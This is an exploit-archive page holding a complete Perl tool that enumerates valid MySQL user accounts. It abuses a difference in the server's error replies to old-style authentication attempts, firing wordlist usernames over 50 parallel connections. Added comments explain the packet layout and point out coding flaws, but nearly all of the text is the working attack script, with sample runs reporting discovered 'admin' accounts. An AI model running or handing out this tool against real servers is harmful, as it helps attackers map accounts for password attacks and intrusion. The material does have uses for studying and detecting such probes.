
Oracle MySQL User Account Enumeration Utility

2012-12-0300:00:00
Kingcope
packetstormsecurity.com
35

0.089 Low

EPSS

Percentile

93.9%

`# MySQL User Account Enumeration Utility  
# When an attacker authenticates using an incorrect password  
# with the old authentication mechanism from mysql 4.x and below to a mysql 5.x server  
# the mysql server will respond with a different message than Access Denied, which makes  
# User Account Enumeration possible.  
# The Downside is that the attacker has to reconnect for each user enumeration attempt  
#20000 user accounts in 7 minutes  
#Mon Jan 16 09:00:18 UTC 2012  
#Mon Jan 16 09:07:26 UTC 2012  
#root@vs2067037:~# wc -l MEDIUM.LST  
#21109 MEDIUM.LST  
#A usernames.txt wordlist is included in this package  
#examples:  
#root@vs2067037:~# perl mysqlenum.pl host usernames.txt  
#  
#[*] HIT! -- USER EXISTS: administrator@host  
#  
#root@vs2067037:~# perl mysqlenum.pl host usernames.txt  
#  
#[*] HIT! -- USER EXISTS: admin@host  
#  
  
# --- Setup ---------------------------------------------------------------
# Wordlist-driven probe: one fresh TCP connection to the target's MySQL port
# per candidate username, fanned out over a pool of forked workers.  No login
# ever succeeds; the only signal is the *difference* between two failure
# replies (see the header comment above).  Server-side, the observable is a
# burst of short-lived connections to 3306 from one source, each ending after
# a single authentication attempt.
# Review notes: bareword filehandles, a 2-arg open with an interpolated path,
# unchecked open/recv results, goto-based retry, and a fixed, predictable
# /tmp path used as the cross-process "stop" flag.
use IO::Socket;  
use Parallel::ForkManager;  
$|=1;  # unbuffered STDOUT so progress and HIT lines appear immediately
  
# Exactly two positional arguments are required: target host, wordlist path.
if ($#ARGV != 1) {  
print "Usage: mysqlenumerate.pl <target> <wordlist>\n";  
exit;  
}  
  
$target = $ARGV[0];  
$wordlist = $ARGV[1];  
# Worker pool size: each batch forks this many children before waiting.
$numforks = 50;  
# Indirect object syntax; Parallel::ForkManager->new($numforks) is the idiom.
$pm = new Parallel::ForkManager($numforks);  
  
# 2-arg open: a path beginning with a mode character ('>', '|') would be
# parsed as an open mode.  The result is unchecked, so a missing wordlist
# silently yields an empty @users.
open FILE,"<$wordlist";  
# '/tmp/cracked' is the shared "a hit was found, stop" flag for all
# processes.  It is a predictable path in a world-writable directory, and
# any pre-existing file there makes the scan exit at once (see the -e check
# in the loop below).
unlink '/tmp/cracked';  
  
# Load every candidate username, stripping the line feed and any stray CR.
@users = ();  
$k=0;  
while(<FILE>) {  
chomp;  
$_ =~ s/\r//g;  
$users[$k++] = $_;  
}  
close FILE;  
# $k2 is the running index into @users.  It is incremented *before* use,
# so $users[0] is never used.
$k2 = 0;  
# Outer loop: run batches of $numforks workers until the list is exhausted
# or the stop flag appears.
for(;;) {  
for ($k=0;$k<$numforks;$k++) {  
$k2++;  
# Evaluated in the parent before each fork: past the end of the list, or
# another worker has already reported a hit -> terminate the scan.
if (($k2 > $#users) or (-e '/tmp/cracked')) {  
exit;  
}  
# start() returns the child pid in the parent (which moves on to fork the
# next worker) and 0 in the child, which falls through to run the probe.
my $pid = $pm->start and next;  
$user = $users[$k2];  
# Connect loop written with goto: on failure print a line and retry.
# There is no retry cap and no delay between attempts.
goto further;  
again:  
print "Connect Error\n";  
further:  
my $sock = IO::Socket::INET->new(PeerAddr => $target,  
PeerPort => '3306',  
Proto => 'tcp') || goto again;  
# Consume the server's initial packet (its greeting).  The contents are
# ignored and the recv return value is not checked.
recv($sock, $buff, 1024, 0);  
  
# Hand-built client authentication packet in the pre-4.1 layout: the two
# high bytes of the length (0), sequence number 0x01, 2-byte client flags
# 0x008d, 3-byte max packet size (0), NUL-terminated username, then a fixed
# 8-byte "PN_QUEME" plus NUL -- presumably the old-style scrambled password
# field.  Its value is irrelevant: the probe only looks at the error text
# and never expects a successful login.  TODO confirm field layout against
# the protocol documentation.
$buf = "\x00\x00\x01\x8d\x00\x00\x00\x00$user\x00\x50".  
"\x4e\x5f\x51\x55\x45\x4d\x45\x00";  
# Prepend the low byte of the 3-byte little-endian payload length.  The
# payload excludes the 4-byte header, and three header bytes (two zero
# bytes + sequence) are already in $buf, hence length-3.
$buf = chr(length($buf)-3). $buf;  
print $sock $buf;  
# Read the server's reply to the failed authentication.  $res (the sender
# address from recv) is assigned but never used.
$res = recv($sock, $buff, 1024, 0);  
close($sock);  
# Progress: dump the raw reply every 100 usernames.
if ($k2 % 100 == 0) {  
print $buff."\n";  
}  
# The discriminator.  A reply whose message begins with "Access" (Access
# denied) is taken to mean the account does not exist; any other reply
# falls through and is treated as a hit.  Offset 7 presumably skips the
# 4-byte packet header, the 0xff error marker and the 2-byte error code --
# confirm against the protocol.  finish() ends the child process, so the
# `next` is only reached if no fork took place.
if (substr($buff, 7, 6) eq "Access") {$pm->finish;next;}  
# First worker to get here records the hit: create the stop flag, report
# on STDOUT, and write the same line to ./jackpot in the current directory
# (truncating it).  Both opens are unchecked, and the child exits without
# calling $pm->finish.
unless (-e '/tmp/cracked') {  
open FILE, ">/tmp/cracked";  
close FILE;  
print "\n[*] HIT! -- USER EXISTS: $user\@$target\n";  
open FILE, ">jackpot";  
print FILE "\n[*] HIT! -- USER EXISTS: $user\@$target\n";  
exit;  
}  
}  
# Parent blocks until the current batch of children has exited, then the
# outer loop forks the next batch.
$pm->wait_all_children;  
}  
`